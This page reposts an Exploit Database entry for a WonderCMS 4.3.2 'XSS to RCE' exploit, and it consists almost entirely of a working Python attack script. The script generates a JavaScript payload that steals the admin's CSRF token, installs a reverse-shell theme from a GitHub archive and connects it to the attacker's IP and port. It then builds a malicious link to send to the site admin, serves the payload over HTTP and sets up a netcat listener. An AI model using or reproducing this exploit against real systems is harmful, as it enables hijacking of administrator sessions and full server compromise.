Wondercms 4.3.2 – XSS to RCE

• Exploit Database
• 17 阅读

• 作者： Anas Zakir
  日期： 2024-02-19
• 类别：

  • webapps
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/51805/

• # Author: prodigiousMind
  # Exploit: Wondercms 4.3.2 XSS to RCE
  
  
  import sys
  import requests
  import os
  import bs4
  
  if (len(sys.argv)<4): print("usage: python3 exploit.py loginURL IP_Address Port\nexample: python3 exploit.py http://localhost/wondercms/loginURL 192.168.29.165 5252")
  else:
  data = '''
  var url = "'''+str(sys.argv[1])+'''";
  if (url.endsWith("/")) {
   url = url.slice(0, -1);
  }
  var urlWithoutLog = url.split("/").slice(0, -1).join("/");
  var urlWithoutLogBase = new URL(urlWithoutLog).pathname; 
  var token = document.querySelectorAll('[name="token"]')[0].value;
  var urlRev = urlWithoutLogBase+"/?installModule=https://github.com/prodigiousMind/revshell/archive/refs/heads/main.zip&directoryName=violet&type=themes&token=" + token;
  var xhr3 = new XMLHttpRequest();
  xhr3.withCredentials = true;
  xhr3.open("GET", urlRev);
  xhr3.send();
  xhr3.onload = function() {
   if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   xhr4.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php");
   xhr4.send();
   xhr4.onload = function() {
   if (xhr4.status == 200) {
   var ip = "'''+str(sys.argv[2])+'''";
   var port = "'''+str(sys.argv[3])+'''";
   var xhr5 = new XMLHttpRequest();
   xhr5.withCredentials = true;
   xhr5.open("GET", urlWithoutLogBase+"/themes/revshell-main/rev.php?lhost=" + ip + "&lport=" + port);
   xhr5.send();
   
   }
   };
   }
  };
  '''
  try:
  open("xss.js","w").write(data)
  print("[+] xss.js is created")
  print("[+] execute the below command in another terminal\n\n----------------------------\nnc -lvp "+str(sys.argv[3]))
  print("----------------------------\n")
  XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+":8000/xss.js\"></script><form+action=\""
  XSSlink = XSSlink.strip(" ")
  print("send the below link to admin:\n\n----------------------------\n"+XSSlink)
  print("----------------------------\n")
  
  print("\nstarting HTTP server to allow the access to xss.js")
  os.system("python3 -m http.server\n")
  except: print(data,"\n","//write this to a file")